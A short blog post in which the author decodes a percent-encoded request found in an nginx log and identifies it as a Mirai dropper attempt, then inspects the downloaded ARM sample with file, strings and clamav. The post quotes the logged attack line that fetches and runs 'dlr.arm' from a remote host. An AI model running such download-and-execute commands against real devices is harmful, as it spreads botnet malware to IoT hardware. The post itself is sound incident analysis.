I was going through my nginx access.log file, and I noticed something interesting.

[IP redacted] - - [25/Mar/2017:10:55:50 -0400] "GET /shell?%63%64%20%2F%74%6D%70%3B%77%67%65%74%20%68%74%74%70%3A%2F%2F%5B%72%65%64%61%63%74%65%64%5D%2F%64%6C%72%2E%61%72%6D%3B%63%68%6D%6F%64%20%37%37%37%20%2A%3B%2E%2F%64%6C%72%2E%61%72%6D HTTP/1.1" 404 570 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"

Normally, the thing after the word “GET” would be a normal route—something like / or /about, not something completely obfuscated by percent-encoding. Since I understandably wanted to see what that actually said, I ran it through a decoder:

/shell?cd /tmp;wget http://[redacted]/dlr.arm;chmod 777 *;./dlr.arm

That’s interesting. It’s trying to execute some shell commands to download and run some executable file by making a GET request with the commands in the URL. Whatever it was trying to run, I’m sure it wasn’t good.

So I did the sensible thing and downloaded the file to look at it.

$ curl -O http://[redacted]/dlr.arm
$ file dlr.arm
dlr.arm: ELF 32-bit LSB executable, ARM, version 1, statically linked, stripped

Well, it is actually an ARM executable. I was honestly half-expecting the file extension to be a lie to throw people off. What else can we learn?

$ strings dlr.arm
GET /mirai/mirai.arm HTTP/1.0

Mirai is malware that targets Internet of Things (IoT) devices, which explains why it was an ARM executable. Once a device is compromised by Mirai, it becomes part of a botnet.

Just for additional confirmation, I scanned the file with clamav. It reported Unix.Trojan.Mirai-5607458-5 FOUND.

I’m not so sure that this is Mirai itself, though That GET request makes me think that it’s something that downloads the actual Mirai executable from somewhere else—but if that is the case, then why isn’t there a remote IP address or URL in the output of strings?

I might look into it more later, but going through the assembly output of objdump doesn’t sound like fun right now.

comments powered by Disqus